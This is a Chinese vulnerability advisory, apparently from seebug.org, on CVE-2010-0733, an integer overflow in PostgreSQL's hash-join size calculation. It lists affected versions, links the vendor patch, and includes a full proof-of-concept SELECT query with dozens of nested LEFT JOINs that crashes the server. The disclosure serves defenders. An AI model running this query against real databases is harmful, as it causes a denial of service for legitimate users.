PostgreSQL哈希表大小计算整数溢出漏洞

2010-03-2300:00:00

Root

www.seebug.org

171

0.046 Low

EPSS

Percentile

91.6%

JSON

CVE(CAN) ID: CVE-2010-0733

PostgreSQL是一款高级对象－关系型数据库管理系统，支持扩展的SQL标准子集。

PostgreSQL的src/backend/executor/nodeHash.c文件在计算哈希表大小时存在整数溢出漏洞，通过认证的用户可以通过发送包含有大量LEFT JOIN子句的SELECT语句触发这个溢出，导致服务崩溃。

PostgreSQL PostgreSQL 8.5 - 8.5 alpha2
PostgreSQL PostgreSQL 8.4.1
厂商补丁：

PostgreSQL

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://git.postgresql.org/gitweb?p=postgresql.git;a=commit;h=64b057e6823655fb6c5d1f24a28f236b94dd6c54


                                                SELECT * from   B AS alias0  LEFT JOIN        BB AS alias1  LEFT JOIN    B
AS alias2  LEFT JOIN     A AS alias3  LEFT JOIN   AA AS alias4  LEFT JOIN  B
AS alias5 ON alias4.int_key = alias5.int_key  ON alias3.int_key =
alias4.int_key   LEFT JOIN    AA AS alias6  LEFT JOIN  A AS alias7 ON
alias6.int_key = alias7.int_key   LEFT JOIN  BB AS alias8 ON alias7.int_key
= alias8.int_key  ON alias3.int_key = alias8.int_key   LEFT JOIN  AA AS
alias9 ON alias6.int_key = alias9.int_key  ON alias2.int_key =
alias8.int_key   LEFT JOIN   BB AS alias10  LEFT JOIN   AA AS alias11  LEFT
JOIN  B AS alias12 ON alias11.int_key = alias12.int_key  ON alias10.int_key
= alias11.int_key  ON alias9.int_key = alias10.int_key  ON alias1.int_key =
alias8.int_key   LEFT JOIN    BB AS alias13  LEFT JOIN      A AS alias14
LEFT JOIN    AA AS alias15  LEFT JOIN  A AS alias16 ON alias15.int_key =
alias16.int_key   LEFT JOIN  B AS alias17 ON alias15.int_key =
alias17.int_key  ON alias14.int_key = alias16.int_key   LEFT JOIN  AA AS
alias18 ON alias14.int_key = alias18.int_key   LEFT JOIN  B AS alias19 ON
alias15.int_key = alias19.int_key   LEFT JOIN  AA AS alias20 ON
alias16.int_key = alias20.int_key  ON alias13.int_key = alias19.int_key  
LEFT JOIN  A AS alias21 ON alias13.int_key = alias21.int_key  ON
alias3.int_key = alias17.int_key   LEFT JOIN  B AS alias22 ON alias7.int_key
= alias22.int_key   LEFT JOIN  A AS alias23 ON alias20.int_key =
alias23.int_key   LEFT JOIN  A AS alias24 ON alias14.int_key =
alias24.int_key   LEFT JOIN     BB AS alias25  LEFT JOIN  BB AS alias26 ON
alias25.int_key = alias26.int_key   LEFT JOIN      A AS alias27  LEFT JOIN
A AS alias28 ON alias27.int_key = alias28.int_key   LEFT JOIN   B AS alias29
LEFT JOIN   BB AS alias30  LEFT JOIN   B AS alias31  LEFT JOIN    A AS
alias32  LEFT JOIN  B AS alias33 ON alias32.int_key = alias33.int_key   LEFT
JOIN  A AS alias34 ON alias32.int_key = alias34.int_key  ON alias31.int_key
= alias33.int_key  ON alias30.int_key = alias33.int_key  ON alias29.int_key
= alias34.int_key  ON alias27.int_key = alias34.int_key   LEFT JOIN   AA AS
alias35  LEFT JOIN  A AS alias36 ON alias35.int_key = alias36.int_key  ON
alias34.int_key = alias36.int_key   LEFT JOIN  A AS alias37 ON
alias33.int_key = alias37.int_key  ON alias25.int_key = alias32.int_key  
LEFT JOIN  A AS alias38 ON alias37.int_key = alias38.int_key  ON
alias15.int_key = alias37.int_key  ON alias0.int_key = alias9.int_key

0.046 Low

EPSS

Percentile

91.6%

JSON

Related for SSV:19322